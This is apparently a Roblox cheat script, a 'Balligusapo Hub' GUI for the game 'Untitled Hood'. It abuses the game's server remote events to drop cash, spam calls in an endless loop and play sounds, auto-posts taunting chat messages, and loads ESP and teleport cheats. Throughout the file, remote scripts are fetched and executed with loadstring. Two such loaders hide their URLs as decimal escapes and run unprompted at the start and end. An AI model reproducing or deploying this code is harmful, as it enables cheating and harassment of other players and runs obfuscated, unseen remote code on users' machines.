


loadstring(game:HttpGet("\104\116\116\112\115\58\47\47\114\97\119\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\66\97\108\108\105\103\117\115\97\112\111\84\84\47\66\97\108\108\105\103\117\115\97\112\111\84\84\47\109\97\105\110\47\65\10"))()


local Library = loadstring(game:HttpGet("https://pastebin.com/raw/vff1bQ9F"))()
local Window = Library.CreateLib("Balligusapo Hub", "BloodTheme")

local Tab = Window:NewTab("Scripts")
local Section = Tab:NewSection("Scripts")
Section:NewTextBox("Speed", "TextboxInfo", function(txt)
game.Players.LocalPlayer.Character.Humanoid.Name = "BuyLinoriaNow"
game.Players.LocalPlayer.Character.BuyLinoriaNow.WalkSpeed = (txt)
end)
Section:NewTextBox("DropCash", "TextboxInfo", function(txt)
-- Script generated by SimpleSpy - credits to exx#9394

local args = {
    [1] = "DropMoney",
    [2] = (txt)
}

game:GetService("ReplicatedStorage"):FindFirstChild(".gg/untitledhood"):FireServer(unpack(args))
end)
Section:NewButton("AutoToxic", "ButtonInfo", function()

-- BlastingStone#8878

local function chat(msg)
   game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(msg, "All")
end

local Randomize = math.random(1, 4)
local Throwdown = math.random(1, 25)

local Mode = 1 -- 0: Dialogue Start | 1: Dialogue | 2: Always throwdown

local function BenDialogue()
   if Throwdown == 1 then
       ThrowdownDialogue()
   elseif Randomize == 1 then
       chat("ez clown")
   elseif Randomize == 2 then
       chat("dog aim kiddo")
   elseif Randomize == 3 then
       chat("ez bozo")
   elseif Randomize == 4 then
       chat("learn some aiming kid")
   end
end

local function BenDialogueStart()
   chat("*ringring*")
   task.wait(2)
   chat("*picks up the phone*")
   task.wait(0.7)
   chat("ben")
end

if Mode == 0 then
   BenDialogueStart()
elseif Mode == 1 then
   BenDialogue()
elseif Mode == 2 then
   ThrowdownDialogue()
else
   warn("Wrong mode! || Ben Script by BlastingStone#8878")
end
end)
Section:NewTextBox("PlayMusic", "TextboxInfo", function(txt)
	local args = {
    [1] = "Boombox",
    [2] = (txt)
}

game:GetService("ReplicatedStorage"):FindFirstChild(".gg/untitledhood"):FireServer(unpack(args))
end)
Section:NewButton("Stop Boombox", "ButtonInfo", function()
-- Script generated by SimpleSpy - credits to exx#9394

local args = {
    [1] = "BoomboxStop"
}

game:GetService("ReplicatedStorage"):FindFirstChild(".gg/untitledhood"):FireServer(unpack(args))
end)
Section:NewButton("Rejoin", "ButtonInfo", function()
game:GetService("TeleportService"):Teleport(game.PlaceId, game:GetService("Players").LocalPlayer)
end)
Section:NewTextBox("SpamCall (Equip Phone)", "TextboxInfo", function(txt)
while true do
wait(0)
-- Script generated by SimpleSpy - credits to exx#9394

local args = {
    [1] = "PhoneCall",
    [2] = (txt)
}

game:GetService("ReplicatedStorage"):FindFirstChild(".gg/untitledhood"):FireServer(unpack(args))
end
end)
Section:NewButton("Esp Player", "ButtonInfo", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/ic3w0lf22/Unnamed-ESP/master/UnnamedESP.lua"))()
end)
Section:NewButton("AutoJump", "ButtonInfo", function()
while true do wait()
game.Players.LocalPlayer.Character.Humanoid.Jump = true
end
end)
Section:NewTextBox("Fov", "TextboxInfo", function(txt)
local amount = 150

game:GetService'Workspace'.Camera.FieldOfView = (txt)
end)

local Tab = Window:NewTab("Animation Gui")
local Section = Tab:NewSection("Untitled Hood Animation")
Section:NewButton("Untitled Hood Animation Gui", "ButtonInfo", function()
loadstring(game:HttpGet("https://pastebin.com/raw/dsALdf8R"))()
end)
local Tab = Window:NewTab("Fun Script")
local Section = Tab:NewSection("Key Needed (Join For Key: https://discord.gg/dFUC87m8YJ)")
Section:NewButton("Ben Tool Script", "ButtonInfo", function()
loadstring(game:HttpGet("\104\116\116\112\115\58\47\47\114\97\119\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\66\97\108\108\105\103\117\115\97\112\111\84\84\47\66\97\108\108\105\103\117\115\97\112\111\84\84\47\109\97\105\110\47\66\101\110\115\99\114\105\112\116\10"))()
end)
Section:NewButton("Teleport Tool With Sound", "ButtonInfo", function()
mouse = game.Players.LocalPlayer:GetMouse()
tool = Instance.new("Tool")
tool.RequiresHandle = false
tool.Name = "Teleport"
tool.Activated:connect(function()
local pos = mouse.Hit+Vector3.new(0,2.5,0)
pos = CFrame.new(pos.X,pos.Y,pos.Z)
game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = pos
-- Script generated by SimpleSpy - credits to exx#9394

local args = {
    [1] = "Boombox",
    [2] = "7549600066"
}

game:GetService("ReplicatedStorage"):FindFirstChild(".gg/untitledhood"):FireServer(unpack(args))
wait(1.9)
-- Script generated by SimpleSpy - credits to exx#9394

local args = {
    [1] = "BoomboxStop"
}

game:GetService("ReplicatedStorage"):FindFirstChild(".gg/untitledhood"):FireServer(unpack(args))
end)
tool.Parent = game.Players.LocalPlayer.Backpack
end)


loadstring(game:HttpGet("\104\116\116\112\115\58\47\47\112\97\115\116\101\98\105\110\46\99\111\109\47\114\97\119\47\105\116\76\51\55\89\109\49\10"))()
